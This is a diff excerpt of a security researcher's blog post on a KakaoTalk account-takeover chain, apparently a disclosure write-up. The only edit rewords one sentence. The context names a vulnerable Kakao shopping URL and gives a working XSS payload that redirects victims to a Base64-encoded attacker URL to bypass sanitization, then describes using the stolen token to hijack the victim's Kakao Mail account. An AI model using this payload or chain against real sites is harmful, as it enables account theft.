stulle123/stulle123.github.io/content/posts/kakaotalk-account-takeover.md

 - `https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:` had the XSS issue
 - `"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUvZm9vLmh0bWw=');">` is the XSS payload.
 We had to Base64 encode the "attacker URL" to bypass some sanitization checks.

 Now, in possession of the access token what could we do with it?
-Well, what about using it to take over the victim's Kakao Mail account that was used for KakaoTalk registration!
+Well, how about we use it to take over the victim's Kakao Mail account that was used for KakaoTalk registration!

 > **_NOTE:_** If the victim doesn't have a Kakao Mail account it's possible to create a new Kakao Mail account on her/his behalf.
 This is interesting because creating a new Kakao Mail account overwrites the user's previous registered email-address with no additional checks.
 Scroll to the end of this section to check out how to do that.